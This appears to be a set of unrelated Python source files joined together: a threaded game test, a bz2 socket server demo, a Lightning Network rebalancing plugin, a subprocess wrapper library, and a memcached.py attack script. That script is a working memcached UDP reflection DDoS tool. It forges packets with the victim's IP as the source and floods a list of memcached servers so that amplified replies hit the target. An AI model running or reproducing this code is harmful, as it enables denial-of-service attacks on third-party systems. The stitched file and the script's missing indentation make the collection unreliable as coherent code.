        # If there is an auth token we can try to actually start syncing
        t = threading.Thread(target=self.pull_thread, args=(wallet, False))
        t.setDaemon(True)
        t.start()
    def stop_wallet(self, wallet):
        """Forget the wallet's key material; stops further syncing."""
        self.wallets.pop(wallet, None)
|
test_game_threading.py
|
from __future__ import unicode_literals, print_function
import threading
from netrps.game import play_second, play_first
def test_game(turn, reset_beacon):
    """Drive one rock-paper-scissors turn with two concurrent players.

    Player 1 and player 2 each run in their own thread; both must observe
    the turn's expected result.
    """
    outcomes = []

    def play(player_number, move_char):
        # Player 1 goes through play_first, player 2 through play_second.
        if player_number == 1:
            outcome = play_first(move_char)
        else:
            outcome = play_second(move_char)
        outcomes.append(outcome)

    first = threading.Thread(target=play, args=(1, turn.p1_mv))
    second = threading.Thread(target=play, args=(2, turn.p2_mv))
    first.start()
    second.start()
    first.join()
    second.join()
    assert outcomes[0] == turn.expected_res
    assert outcomes[1] == turn.expected_res
|
bz2_server.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import bz2
import logging
import socketserver
import binascii
BLOCK_SIZE = 32
class Bz2RequestHandler(socketserver.BaseRequestHandler):
    """Streams a client-requested file back bz2-compressed, block by block."""
    logger = logging.getLogger('Server')
    def handle(self):
        """Read a filename from the client and send its compressed bytes."""
        compressor = bz2.BZ2Compressor()
        # Find out what file the client wants
        filename = self.request.recv(1024).decode('utf-8')
        self.logger.debug('client asked for: "%s"', filename)
        # Send chunks of the file as they are compressed
        # (NOTE: `input` shadows the builtin; kept for byte-compatibility.)
        with open(filename, 'rb') as input:
            while True:
                block = input.read(BLOCK_SIZE)
                if not block:
                    break
                self.logger.debug('RAW %r', block)
                compressed = compressor.compress(block)
                if compressed:
                    self.logger.debug(
                        'SENDING %r',
                        binascii.hexlify(compressed))
                    self.request.send(compressed)
                else:
                    # The compressor is buffering; nothing to send yet.
                    self.logger.debug('BUFFERING')
        # Send any data being buffered by the compressor
        remaining = compressor.flush()
        while remaining:
            to_send = remaining[:BLOCK_SIZE]
            remaining = remaining[BLOCK_SIZE:]
            self.logger.debug('FLUSHING %r',
                              binascii.hexlify(to_send))
            self.request.send(to_send)
        return
# Demo driver: start the bz2 server on a random port in a daemon thread,
# then act as a client that requests a file and decompresses the reply.
if __name__ == '__main__':
    import socket
    import sys
    from io import StringIO
    import threading
    logging.basicConfig(level=logging.DEBUG,
                        format='%(name)s: %(message)s',
                        )
    # Set up a server, running in a separate thread
    address = ('localhost', 0)  # let the kernel assign a port
    server = socketserver.TCPServer(address, Bz2RequestHandler)
    ip, port = server.server_address  # what port was assigned?
    t = threading.Thread(target=server.serve_forever)
    # NOTE(review): setDaemon() is deprecated; `t.daemon = True` is the
    # modern spelling.
    t.setDaemon(True)
    t.start()
    logger = logging.getLogger('Client')
    # Connect to the server
    logger.info('Contacting server on %s:%s', ip, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    # Ask for a file
    # NOTE(review): sys.argv[0] is this script's own name; sys.argv[1]
    # looks intended when an argument is supplied -- confirm.
    requested_file = (sys.argv[0]
                      if len(sys.argv) > 1
                      else 'lorem.txt')
    logger.debug('sending filename: "%s"', requested_file)
    len_sent = s.send(requested_file.encode('utf-8'))
    # Receive a response
    buffer = StringIO()
    decompressor = bz2.BZ2Decompressor()
    while True:
        response = s.recv(BLOCK_SIZE)
        if not response:
            break
        logger.debug('READ %r', binascii.hexlify(response))
        # Include any unconsumed data when feeding the
        # decompressor.
        decompressed = decompressor.decompress(response)
        if decompressed:
            logger.debug('DECOMPRESSED %r', decompressed)
            buffer.write(decompressed.decode('utf-8'))
        else:
            logger.debug('BUFFERING')
    full_response = buffer.getvalue()
    lorem = open(requested_file, 'rt').read()
    logger.debug('response matches file contents: %s',
                 full_response == lorem)
    # Clean up
    server.shutdown()
    server.socket.close()
    s.close()
|
memcached.py
|
#!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, UDP, send, Raw
from threading import Thread
def MEMCACHED_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting MEMCACHED attack...")
# Payload
payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
threads_list = []
# Load MEMCACHED servers list
with open("tools/other/memcached_servers.txt", 'r') as f:
memcached_servers = f.readlines()
# MEMCACHED flood
def memcached_flood():
global FINISH
while not FINISH:
for server in memcached_servers:
if not FINISH:
packets = random.randint(10, 150)
server = server.replace("\n", "")
# Packet
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = target_port, dport = 11211) / Raw(load = payload)
send(packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " forged UDP packets to " + server + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = memcached_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
jitrebalance.py
|
#!/usr/bin/env python3
from math import ceil
from pyln.client import Plugin, Millisatoshi, RpcError
import binascii
import hashlib
import secrets
import threading
import time
plugin = Plugin()
def get_reverse_chan(scid, chan):
    """Return the listchannels entry for the opposite direction of `chan`.

    Returns None when the reverse direction is not announced.
    """
    # The two directions of a channel carry distinct channel_flags; pick
    # the entry whose flags differ from our own direction.
    candidates = plugin.rpc.listchannels(scid)['channels']
    reverse = (c for c in candidates if c['channel_flags'] != chan['direction'])
    return next(reverse, None)
def get_circular_route(scid, chan, amt, peer, exclusions, request):
    """Compute a circular route with `scid` as last leg.

    Args:
        scid: Short channel id of the channel to refill.
        chan: Our side's channel entry (from listpeers).
        amt: Amount in msat to push through the last leg.
        peer: The peer at the far end of `scid`.
        exclusions: Channel/direction strings getroute must avoid.
        request: The pending htlc_accepted hook request (unused here).

    Returns:
        A route list suitable for sendpay, or None if none can be found.
    """
    # Compute the last leg of the route first, so we know the parameters to
    # traverse that last edge.
    reverse_chan = get_reverse_chan(scid, chan)
    if reverse_chan is None:
        plugin.log("Could not compute parameters for the last hop")
        return None
    # The hop before the last must carry amt plus the last hop's fee.
    last_amt = ceil(float(amt) +
                    float(amt) * reverse_chan['fee_per_millionth'] / 10**6 +
                    reverse_chan['base_fee_millisatoshi'])
    # Final delta of 9 blocks plus the last channel's CLTV delta.
    last_cltv = 9 + reverse_chan['delay']
    try:
        route = plugin.rpc.getroute(
            node_id=peer['id'],
            msatoshi=last_amt,
            riskfactor=1,
            exclude=exclusions,
            cltv=last_cltv,
        )['route']
        # Append the last hop we computed manually above
        route += [{
            'id': plugin.node_id,
            'channel': scid,
            'direction': chan['direction'],
            'msatoshi': amt,
            'amount_msat': '{}msat'.format(amt),
            'delay': 9
        }]
        return route
    except RpcError:
        plugin.log("Could not get a route, no remaining one? Exclusions : {}"
                   .format(exclusions))
        return None
def try_rebalance(scid, chan, amt, peer, request):
    """Repeatedly attempt a circular rebalance of `scid`.

    Stops when a payment completes, no route remains, or the configured
    timeout elapses. Resolves `request` with "continue" on failure; on
    success the settlement path in on_htlc_accepted resolves it instead.
    """
    # Exclude the channel we are trying to rebalance when searching for a
    # path. We will manually append it to the route and bump the other
    # parameters so it can be used afterwards
    exclusions = [
        "{scid}/{direction}".format(scid=scid, direction=chan['direction'])
    ]
    # Try as many routes as possible before the timeout expires
    stop_time = int(time.time()) + plugin.rebalance_timeout
    while int(time.time()) <= stop_time:
        route = get_circular_route(scid, chan, amt, peer, exclusions, request)
        # We exhausted all the possibilities, Game Over
        if route is None:
            request.set_result({"result": "continue"})
            return
        # We're about to initiate a rebalancing, we'd better remember how we can
        # settle it once we see it back here.
        payment_key = secrets.token_bytes(32)
        payment_hash = hashlib.sha256(payment_key).hexdigest()
        plugin.rebalances[payment_hash] = {
            "payment_key": binascii.hexlify(payment_key).decode('ASCII'),
            "payment_hash": payment_hash,
            "request": request,
        }
        # After all this work we're finally in a position to judge whether a
        # rebalancing is worth it at all. The rebalancing is considered worth it
        # if the fees we're about to pay are less than or equal to the fees we get
        # out of forwarding the payment.
        # NOTE(review): despite the comment above, no fee comparison is
        # actually performed here -- confirm whether that check was lost.
        plugin.log("Sending rebalance request using payment_hash={}, route={}".format(
            payment_hash, route
        ))
        try:
            plugin.rpc.sendpay(route, payment_hash)
            # If the attempt is successful, we acknowledged it on the
            # receiving end (a couple of line above), so we leave it dangling
            # here.
            if (plugin.rpc.waitsendpay(payment_hash).get("status")
                    == "complete"):
                plugin.log("Succesfully re-filled outgoing capacity in {},"
                           "payment_hash={}".format(scid, payment_hash))
                return
        except RpcError as e:
            error = e.error['data']
            # The erring_channel field can not be present (shouldn't happen) or
            # can be "0x0x0"
            erring_channel = error.get('erring_channel', '0x0x0')
            if erring_channel != '0x0x0':
                # If the channel we are refilling itself failed, give up.
                if erring_channel == scid:
                    break
                erring_direction = error['erring_direction']
                exclusions.append("{}/{}".format(erring_channel,
                                                 erring_direction))
                plugin.log("Excluding {} due to a failed attempt"
                           .format(erring_channel))
    plugin.log("Timed out while trying to rebalance")
    request.set_result({"result": "continue"})
def get_peer_and_channel(peers, scid):
    """Look for the channel identified by {scid} in our list of {peers}"""
    for candidate in peers:
        # Collect this peer's channels matching the short channel id; the
        # first hit wins, mirroring a plain nested scan.
        matching = [
            c for c in candidate["channels"]
            if c.get("short_channel_id") == scid
        ]
        if matching:
            return (candidate, matching[0])
    return (None, None)
@plugin.async_hook("htlc_accepted")
def on_htlc_accepted(htlc, onion, plugin, request, **kwargs):
    """htlc_accepted hook: rebalance the outgoing channel just in time.

    Settles our own pending rebalance payments, lets HTLCs we can already
    forward pass through, and otherwise kicks off a background rebalance
    before resolving the hook.
    """
    plugin.log("Got an incoming HTLC htlc={}".format(htlc))
    # The HTLC might be a rebalance we ourselves initiated, better check
    # against the list of pending ones.
    rebalance = plugin.rebalances.get(htlc['payment_hash'], None)
    if rebalance is not None:
        # Settle the rebalance, before settling the request that initiated
        # the rebalance.
        request.set_result({
            "result": "resolve",
            "payment_key": rebalance['payment_key']
        })
        # Now wait for it to settle correctly
        plugin.rpc.waitsendpay(htlc['payment_hash'])
        rebalance['request'].set_result({"result": "continue"})
        # Clean up our stash of active rebalancings.
        del plugin.rebalances[htlc['payment_hash']]
        return
    # Check to see if the next channel has sufficient capacity
    scid = onion['short_channel_id'] if 'short_channel_id' in onion else '0x0x0'
    # Are we the destination? Then there's nothing to do. Continue.
    if scid == '0x0x0':
        request.set_result({"result": "continue"})
        return
    # Locate the channel + direction that would be the next in the path
    peers = plugin.rpc.listpeers()['peers']
    peer, chan = get_peer_and_channel(peers, scid)
    if peer is None or chan is None:
        # BUGFIX: resolve the hook instead of returning without a result;
        # an async hook that never calls set_result leaves the HTLC (and
        # lightningd's forwarding decision) hanging forever.
        request.set_result({"result": "continue"})
        return
    # Check if the channel is active and routable, otherwise there's little
    # point in even trying
    if not peer['connected'] or chan['state'] != "CHANNELD_NORMAL":
        request.set_result({"result": "continue"})
        return
    # Need to consider who the funder is, since they are paying the fees.
    # TODO If we are the funder we need to take the cost of an HTLC into
    # account as well.
    # funder = chan['msatoshi_to_us_max'] == chan['msatoshi_total']
    forward_amt = Millisatoshi(onion['forward_amount'])
    # If we have enough capacity just let it through now. Otherwise the
    # Millisatoshi raises an error for negative amounts in the calculation
    # below.
    if forward_amt < chan['spendable_msat']:
        request.set_result({"result": "continue"})
        return
    # Compute the amount we need to rebalance, give us a bit of breathing
    # room while we're at it (25% more rebalancing than strictly necessary)
    # so we don't end up with a completely unbalanced channel right away
    # again, and to account for a bit of fuzziness when it comes to dipping
    # into the reserve.
    amt = ceil(int(forward_amt - chan['spendable_msat']) * 1.25)
    # If we have a higher balance than is required we don't need to
    # rebalance, just stop here.
    if amt <= 0:
        request.set_result({"result": "continue"})
        return
    # Run the (potentially slow) rebalance off the hook thread.
    t = threading.Thread(target=try_rebalance, args=(scid, chan, amt, peer, request))
    t.daemon = True
    t.start()
@plugin.init()
def init(options, configuration, plugin):
    """Plugin startup: cache our node id and read the timeout option."""
    plugin.log("jitrebalance.py initializing {}".format(configuration))
    plugin.node_id = plugin.rpc.getinfo()['id']
    # FIXME: this int() shouldn't be needed: check if this is pyln's or
    # lightningd's fault.
    plugin.rebalance_timeout = int(options.get("jitrebalance-try-timeout"))
    # Set of currently active rebalancings, keyed by their payment_hash
    plugin.rebalances = {}
# Register the configurable timeout option, then hand control to the
# plugin's main loop (blocks until lightningd shuts the plugin down).
plugin.add_option(
    "jitrebalance-try-timeout",
    60,
    "Number of seconds before we stop trying to rebalance a channel.",
    opt_type="int"
)
plugin.run()
|
__init__.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of command_runner module
"""
command_runner is a quick tool to launch commands from Python, get exit code
and output, and handle most errors that may happen
Versioning semantics:
Major version: backward compatibility breaking changes
Minor version: New functionality
Patch version: Backwards compatible bug fixes
"""
__intname__ = "command_runner"
__author__ = "Orsiris de Jong"
__copyright__ = "Copyright (C) 2015-2021 Orsiris de Jong"
__licence__ = "BSD 3 Clause"
__version__ = "1.3.0"
__build__ = "2021100501"
import io
import os
import shlex
import subprocess
import sys
from datetime import datetime
from logging import getLogger
from time import sleep
try:
import psutil
except ImportError:
# Don't bother with an error since we need command_runner to work without dependencies
pass
try:
import signal
except ImportError:
pass
# Python 2.7 compat fixes (queue was Queue)
try:
import queue
except ImportError:
import Queue as queue
import threading
# Python 2.7 compat fixes (missing typing and FileNotFoundError)
try:
from typing import Union, Optional, List, Tuple, NoReturn, Any
except ImportError:
pass
try:
FileNotFoundError
except NameError:
# pylint: disable=W0622 (redefined-builtin)
FileNotFoundError = IOError
# Python <= 3.2 has no subprocess.TimeoutExpired; provide a compatible
# stand-in so callers can always catch command_runner's TimeoutExpired.
try:
    TimeoutExpired = subprocess.TimeoutExpired
except AttributeError:
    class TimeoutExpired(BaseException):
        """
        Basic redeclaration when subprocess.TimeoutExpired does not exist, python <= 3.3
        """
        def __init__(self, cmd, timeout, output=None, stderr=None):
            self.cmd = cmd
            self.timeout = timeout
            self.output = output
            self.stderr = stderr

        def __str__(self):
            return "Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)

        @property
        def stdout(self):
            # Mirror subprocess.TimeoutExpired, where stdout aliases output.
            return self.output

        @stdout.setter
        def stdout(self, value):
            # There's no obvious reason to set this, but allow it anyway so
            # .stdout is a transparent alias for .output
            self.output = value
class KbdInterruptGetOutput(BaseException):
    """Carries the output captured so far when a KeyboardInterrupt occurs."""

    def __init__(self, output):
        # Keep the captured output on a private attribute; it is exposed
        # read-only through the `output` property below.
        self._output = output

    @property
    def output(self):
        """Read-only accessor for the captured command output."""
        return self._output
logger = getLogger(__intname__)
PIPE = subprocess.PIPE
MIN_RESOLUTION = 0.05 # Minimal sleep time between polling, reduces CPU usage
def kill_childs_mod(
    pid=None,  # type: int
    itself=False,  # type: bool
    soft_kill=False,  # type: bool
):
    # type: (...) -> bool
    """
    Inline version of ofunctions.kill_childs that has no hard dependency on psutil
    Kills all childs of pid (current pid can be obtained with os.getpid())
    If no pid given current pid is taken
    Good idea when using multiprocessing, is to call with atexit.register(ofunctions.kill_childs, os.getpid(),)
    Beware: MS Windows does not maintain a process tree, so child dependencies are computed on the fly
    Knowing this, orphaned processes (where parent process died) cannot be found and killed this way
    Prefer using process.send_signal() in favor of process.kill() to avoid race conditions when PID was reused too fast
    :param pid: Which pid tree we'll kill
    :param itself: Should parent be killed too ?
    :param soft_kill: Prefer SIGTERM / terminate() over SIGKILL / kill()
    :return: True when the psutil process-tree walk succeeded, False when we
             fell back to a plain os.kill of the given pid only
    """
    sig = None
    ### BEGIN COMMAND_RUNNER MOD
    if "psutil" not in sys.modules:
        logger.error(
            "No psutil module present. Can only kill direct pids, not child subtree."
        )
    if "signal" not in sys.modules:
        logger.error(
            "No signal module present. Using direct psutil kill API which might have race conditions when PID is reused too fast."
        )
    else:
        """
        Extract from Python3 doc
        On Windows, signal() can only be called with SIGABRT, SIGFPE, SIGILL, SIGINT, SIGSEGV, SIGTERM, or SIGBREAK.
        A ValueError will be raised in any other case. Note that not all systems define the same set of signal names;
        an AttributeError will be raised if a signal name is not defined as SIG* module level constant.
        """
        try:
            if not soft_kill and hasattr(signal, "SIGKILL"):
                # Don't bother to make pylint go crazy on Windows
                # pylint: disable=E1101
                sig = signal.SIGKILL
            else:
                sig = signal.SIGTERM
        except NameError:
            sig = None
    ### END COMMAND_RUNNER MOD
    def _process_killer(
        process,  # type: Union[subprocess.Popen, psutil.Process]
        sig,  # type: signal.valid_signals
        soft_kill,  # type: bool
    ):
        # (...) -> None
        """
        Simple abstract process killer that works with signals in order to avoid reused PID race conditions
        and can prefer using terminate rather than kill
        """
        if sig:
            try:
                process.send_signal(sig)
            # psutil.NoSuchProcess might not be available, let's be broad
            # pylint: disable=W0703
            except Exception:
                pass
        else:
            # No usable signal (e.g. signal module missing): fall back to the
            # process object's own terminate/kill API
            if soft_kill:
                process.terminate()
            else:
                process.kill()
    try:
        current_process = psutil.Process(pid if pid is not None else os.getpid())
    # psutil.NoSuchProcess might not be available, let's be broad
    # pylint: disable=W0703
    except Exception:
        # psutil missing or process gone: best effort direct kill of the pid only
        if itself:
            os.kill(
                pid, 15
            )  # 15 being signal.SIGTERM or SIGKILL depending on the platform
        return False
    # Kill children first, then (optionally) the parent itself
    for child in current_process.children(recursive=True):
        _process_killer(child, sig, soft_kill)
    if itself:
        _process_killer(current_process, sig, soft_kill)
    return True
def command_runner(
    command,  # type: Union[str, List[str]]
    valid_exit_codes=None,  # type: Optional[List[int]]
    timeout=3600,  # type: Optional[int]
    shell=False,  # type: bool
    encoding=None,  # type: Optional[str]
    stdout=None,  # type: Optional[Union[int, str]]
    stderr=None,  # type: Optional[Union[int, str]]
    windows_no_window=False,  # type: bool
    live_output=False,  # type: bool
    method="monitor",  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> Tuple[Optional[int], str]
    """
    Unix & Windows compatible subprocess wrapper that handles output encoding and timeouts
    Newer Python check_output already handles encoding and timeouts, but this one is retro-compatible
    It is still recommended to set cp437 for windows and utf-8 for unix
    Also allows a list of various valid exit codes (ie no error when exit code = arbitrary int)
    command should be a list of strings, eg ['ping', '127.0.0.1', '-c 2']
    command can also be a single string, ex 'ping 127.0.0.1 -c 2' if shell=True or if os is Windows
    Accepts all of subprocess.popen arguments
    Whenever we can, we need to avoid shell=True in order to preserve better security
    Avoiding shell=True involves passing absolute paths to executables since we don't have shell PATH environment
    When no stdout option is given, we'll get output into the returned (exit_code, output) tuple
    When stdout = filename or stderr = filename, we'll write output to the given file
    live_output will poll the process for output and show it on screen (output may be non reliable, don't use it if
    your program depends on the commands' stdout output)
    windows_no_window will disable visible window (MS Windows platform only)
    Returns a tuple (exit_code, output)

    :param command: Command as arg list, or single string (shell=True / Windows)
    :param valid_exit_codes: Exit codes besides 0 that are not logged as errors
    :param timeout: Seconds before the process tree is killed (None disables)
    :param encoding: Output decoding, defaults to cp437 on Windows, utf-8 elsewhere
    :param stdout: None (capture), False (discard), a filename, or a pipe/fd
    :param stderr: None (merge into stdout), False (discard), a filename, or a pipe/fd
    :param method: "monitor" (communicate() based) or "poller" (pipe reader thread)
    Special exit codes: -252 KeyboardInterrupt, -253 OS/file error,
    -254 timeout, -255 unknown failure.
    """
    # Choose default encoding when none set
    # cp437 encoding assures we catch most special characters from cmd.exe
    if not encoding:
        encoding = "cp437" if os.name == "nt" else "utf-8"
    # Fix when unix command was given as single string
    # This is more secure than setting shell=True
    if os.name == "posix" and shell is False and isinstance(command, str):
        command = shlex.split(command)
    # Set default values for kwargs
    errors = kwargs.pop(
        "errors", "backslashreplace"
    )  # Don't let encoding issues make you mad
    universal_newlines = kwargs.pop("universal_newlines", False)
    creationflags = kwargs.pop("creationflags", 0)
    # subprocess.CREATE_NO_WINDOW was added in Python 3.7 for Windows OS only
    if (
        windows_no_window
        and sys.version_info[0] >= 3
        and sys.version_info[1] >= 7
        and os.name == "nt"
    ):
        # Disable the following pylint error since the code also runs on nt platform, but
        # triggers an error on Unix
        # pylint: disable=E1101
        creationflags = creationflags | subprocess.CREATE_NO_WINDOW
    close_fds = kwargs.pop("close_fds", "posix" in sys.builtin_module_names)
    # Default buffer size. line buffer (1) is deprecated in Python 3.7+
    bufsize = kwargs.pop("bufsize", 16384)
    # Decide whether we write to output variable only (stdout=None), to output variable and stdout (stdout=PIPE)
    # or to output variable and to file (stdout='path/to/file')
    stdout_to_file = False
    if stdout is None:
        _stdout = PIPE
    elif isinstance(stdout, str):
        # We will send anything to file
        _stdout = open(stdout, "wb")
        stdout_to_file = True
    elif stdout is False:
        _stdout = subprocess.DEVNULL
    else:
        # We will send anything to given stdout pipe
        _stdout = stdout
    # The only situation where we don't add stderr to stdout is if a specific target file was given
    stderr_to_file = False
    if isinstance(stderr, str):
        _stderr = open(stderr, "wb")
        stderr_to_file = True
    elif stderr is False:
        _stderr = subprocess.DEVNULL
    else:
        _stderr = subprocess.STDOUT
    def to_encoding(
        process_output,  # type: Union[str, bytes]
        encoding,  # type: str
        errors,  # type: str
    ):
        # type: (...) -> str
        """
        Convert bytes output to string and handles conversion errors
        """
        # Compatibility for earlier Python versions where Popen has no 'encoding' nor 'errors' arguments
        if isinstance(process_output, bytes):
            try:
                process_output = process_output.decode(encoding, errors=errors)
            except TypeError:
                try:
                    # handle TypeError: don't know how to handle UnicodeDecodeError in error callback
                    process_output = process_output.decode(encoding, errors="ignore")
                except (ValueError, TypeError):
                    # What happens when str cannot be concatenated
                    logger.debug("Output cannot be captured {}".format(process_output))
        return process_output
    def _read_pipe(
        stream,  # type: io.StringIO
        output_queue,  # type: queue.Queue
    ):
        # type: (...) -> None
        """
        will read from subprocess.PIPE
        Must be threaded since readline() might be blocking on Windows GUI apps
        Partly based on https://stackoverflow.com/a/4896288/2635443
        """
        # WARNING: Depending on the stream type (binary or text), the sentinel character
        # needs to be of the same type, or the iterator won't have an end
        # We also need to check that stream has readline, in case we're writing to files instead of PIPE
        if hasattr(stream, "readline"):
            sentinel_char = "" if hasattr(stream, "encoding") else b""
            for line in iter(stream.readline, sentinel_char):
                output_queue.put(line)
            # None is the end-of-stream marker consumed by _poll_process
            output_queue.put(None)
            stream.close()
    def _poll_process(
        process,  # type: Union[subprocess.Popen[str], subprocess.Popen]
        timeout,  # type: int
        encoding,  # type: str
        errors,  # type: str
    ):
        # type: (...) -> Tuple[Optional[int], str]
        """
        Process stdout/stderr output polling is only used in live output mode
        since it takes more resources than using communicate()
        Reads from process output pipe until:
        - Timeout is reached, in which case we'll terminate the process
        - Process ends by itself
        Returns an encoded string of the pipe output
        """
        begin_time = datetime.now()
        output = ""
        output_queue = queue.Queue()
        def __check_timeout(
            begin_time,  # type: datetime.timestamp
            timeout,  # type: int
        ):
            # type: (...) -> None
            """
            Simple subfunction to check whether timeout is reached
            Since we check this alot, we put it into a function
            """
            if timeout and (datetime.now() - begin_time).total_seconds() > timeout:
                kill_childs_mod(process.pid, itself=True, soft_kill=False)
                raise TimeoutExpired(process, timeout, output)
        try:
            read_thread = threading.Thread(
                target=_read_pipe, args=(process.stdout, output_queue)
            )
            read_thread.daemon = True  # thread dies with the program
            read_thread.start()
            while True:
                try:
                    line = output_queue.get(timeout=MIN_RESOLUTION)
                except queue.Empty:
                    __check_timeout(begin_time, timeout)
                else:
                    if line is None:
                        # End-of-stream marker set by _read_pipe
                        break
                    else:
                        line = to_encoding(line, encoding, errors)
                        if live_output:
                            sys.stdout.write(line)
                        output += line
                        __check_timeout(begin_time, timeout)
            # Make sure we wait for the process to terminate, even after
            # output_queue has finished sending data, so we catch the exit code
            while process.poll() is None:
                __check_timeout(begin_time, timeout)
            # Additional timeout check to make sure we don't return an exit code from processes
            # that were killed because of timeout
            __check_timeout(begin_time, timeout)
            exit_code = process.poll()
            return exit_code, output
        except KeyboardInterrupt:
            raise KbdInterruptGetOutput(output)
    def _timeout_check_thread(
        process,  # type: Union[subprocess.Popen[str], subprocess.Popen]
        timeout,  # type: int
        timeout_queue,  # type: queue.Queue
    ):
        # type: (...) -> None
        """
        Since elder python versions don't have timeout, we need to manually check the timeout for a process
        """
        begin_time = datetime.now()
        while True:
            if timeout and (datetime.now() - begin_time).total_seconds() > timeout:
                kill_childs_mod(process.pid, itself=True, soft_kill=False)
                # Signal the monitor loop that we killed because of timeout
                timeout_queue.put(True)
                break
            if process.poll() is not None:
                break
            sleep(MIN_RESOLUTION)
    def _monitor_process(
        process,  # type: Union[subprocess.Popen[str], subprocess.Popen]
        timeout,  # type: int
        encoding,  # type: str
        errors,  # type: str
    ):
        # type: (...) -> Tuple[Optional[int], str]
        """
        Create a thread in order to enforce timeout
        Get stdout output and return it
        """
        # Shared mutable objects have proven to have race conditions with PyPy 3.7 (mutable object
        # is changed in thread, but outer monitor function has still old mutable object state)
        # Strangely, this happened only sometimes on github actions/ubuntu 20.04.3 & pypy 3.7
        # Let's create a queue to get the timeout thread response on a deterministic way
        timeout_queue = queue.Queue()
        is_timeout = False
        thread = threading.Thread(
            target=_timeout_check_thread,
            args=(process, timeout, timeout_queue),
        )
        # NOTE(review): setDaemon() is deprecated since Python 3.10 in favor of
        # thread.daemon = True — kept as-is for behavior parity
        thread.setDaemon(True)
        thread.start()
        process_output = None
        stdout = None
        try:
            # Don't use process.wait() since it may deadlock on old Python versions
            # Also it won't allow communicate() to get incomplete output on timeouts
            while process.poll() is None:
                sleep(MIN_RESOLUTION)
                try:
                    is_timeout = timeout_queue.get_nowait()
                except queue.Empty:
                    pass
                else:
                    break
                # We still need to use process.communicate() in this loop so we don't get stuck
                # with poll() is not None even after process is finished
                if _stdout is not False:
                    try:
                        stdout, _ = process.communicate()
                    # ValueError is raised on closed IO file
                    except (TimeoutExpired, ValueError):
                        pass
            exit_code = process.poll()
            if _stdout is not False:
                try:
                    stdout, _ = process.communicate()
                except (TimeoutExpired, ValueError):
                    pass
            process_output = to_encoding(stdout, encoding, errors)
            # On PyPy 3.7 only, we can have a race condition where we try to read the queue before
            # the thread could write to it, failing to register a timeout.
            # This workaround prevents reading the queue while the thread is still alive
            while thread.is_alive():
                sleep(MIN_RESOLUTION)
            try:
                is_timeout = timeout_queue.get_nowait()
            except queue.Empty:
                pass
            if is_timeout:
                raise TimeoutExpired(process, timeout, process_output)
            return exit_code, process_output
        except KeyboardInterrupt:
            raise KbdInterruptGetOutput(process_output)
    try:
        # Finally, we won't use encoding & errors arguments for Popen
        # since it would defeat the idea of binary pipe reading in live mode
        # Python >= 3.3 has SubProcessError(TimeoutExpired) class
        # Python >= 3.6 has encoding & error arguments
        # universal_newlines=True makes netstat command fail under windows
        # timeout does not work under Python 2.7 with subprocess32 < 3.5
        # decoder may be cp437 or unicode_escape for dos commands or utf-8 for powershell
        # Disabling pylint error for the same reason as above
        # pylint: disable=E1123
        if sys.version_info >= (3, 6):
            process = subprocess.Popen(
                command,
                stdout=_stdout,
                stderr=_stderr,
                shell=shell,
                universal_newlines=universal_newlines,
                encoding=encoding,
                errors=errors,
                creationflags=creationflags,
                bufsize=bufsize,  # 1 = line buffered
                close_fds=close_fds,
                **kwargs
            )
        else:
            process = subprocess.Popen(
                command,
                stdout=_stdout,
                stderr=_stderr,
                shell=shell,
                universal_newlines=universal_newlines,
                creationflags=creationflags,
                bufsize=bufsize,
                close_fds=close_fds,
                **kwargs
            )
        try:
            # NOTE(review): due to operator precedence this reads as
            # (method == "poller") or (live_output and _stdout is not False),
            # so an explicit method="poller" takes the poller path even when
            # stdout=False (no pipe) — confirm this is intended, since
            # _poll_process reads process.stdout
            if method == "poller" or live_output and _stdout is not False:
                exit_code, output = _poll_process(process, timeout, encoding, errors)
            else:
                exit_code, output = _monitor_process(process, timeout, encoding, errors)
        except KbdInterruptGetOutput as exc:
            exit_code = -252
            output = "KeyboardInterrupted. Partial output\n{}".format(exc.output)
            try:
                kill_childs_mod(process.pid, itself=True, soft_kill=False)
            except AttributeError:
                pass
            if stdout_to_file:
                _stdout.write(output.encode(encoding, errors=errors))
        logger.debug(
            'Command "{}" returned with exit code "{}". Command output was:'.format(
                command, exit_code
            )
        )
    except subprocess.CalledProcessError as exc:
        exit_code = exc.returncode
        try:
            output = exc.output
        except AttributeError:
            output = "command_runner: Could not obtain output from command."
        # NOTE(review): the error log below runs even when exit_code is in
